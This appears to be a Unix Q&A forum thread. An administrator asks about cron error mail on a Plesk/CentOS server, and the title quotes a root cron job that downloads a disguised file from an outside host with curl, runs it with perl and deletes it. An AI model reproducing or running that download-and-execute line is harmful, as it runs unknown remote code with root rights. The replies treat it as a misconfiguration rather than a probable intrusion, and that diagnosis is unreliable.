# Plesk, Centos server error: Cron <root@...> cd /tmp;curl -s -O http://.../r.png;perl r.png;rm -fr r.png

Tags: centos, cron, plesk

I had the bright idea of clearing some space on the root partition. I thought I was fairly safe from what I have read by removing some of the locale files for Plesk and some of the backup.tar.gz and logs.tar.gz but I must have removed something by accident. 
I have looked back at the message and although I have removed the addresses and any IP's the location its trying to download the file from is on another server. I have looked through the message header and it is coming from the root account to the root account. I don't normally take care of this but the usual guy is away for a couple of weeks.

```
Bareword found where operator expected at r.png line 3, near "403 Forbidden"
    (Missing operator before Forbidden?)
Bareword found where operator expected at r.png line 4, near "</head"
  (Might be a runaway multi-line // string starting on line 3)
    (Missing operator before head?)
Bareword found where operator expected at r.png line 6, near "<p>You don't have permission to access /r"
  (Might be a runaway multi-line // string starting on line 5)
    (Missing operator before r?)
Bareword found where operator expected at r.png line 9, near "<address>Apache"
    (Missing operator before Apache?)
Bareword found where operator expected at r.png line 9, near ") Server"
    (Missing operator before Server?)
Bareword found where operator expected at r.png line 9, near "IP ADDRESS Port"
    (Missing operator before Port?)
Number found where operator expected at r.png line 9, near "Port 80"
    (Do you need to predeclare Port?)
Bareword found where operator expected at r.png line 10, near "</body"
  (Might be a runaway multi-line // string starting on line 9)
    (Missing operator before body?)
syntax error at r.png line 2, near "html>"
Execution of r.png aborted due to compilation errors.
```

Comment: You're asking us to help you troubleshoot, you're not asking about general Unix knowledge (which is what this website is about). You should try to reword this question so it become more generic and (potentially) useful for others.

Comment: Try looking in your crontabs for context, comments, etc.  If you don't know how to do this or where crontabs may be stored, try Google, then ask a new, specific question about that.

Answer (score 2):

You're downloading a png file and executing it with perl. That's never going to work. You're also not allowed to download the png file, so you're actually executing the resulting 403 error page with perl, which won't work either.

Comment: Is there anyway I can trace this back to find out which user is causing it? It only started occurring after I cleared some disk space so I have to assume its something I have done to cause it. Thanks Dennis

Comment: Check the X-Cron-Env headers in the mail

Comment: I have checked the header information and it is the root account emailing the main server contact. looking back through the original message though the IP that it is trying to download the .png from isn't ours. Can you suggest anything else to check? Thanks again.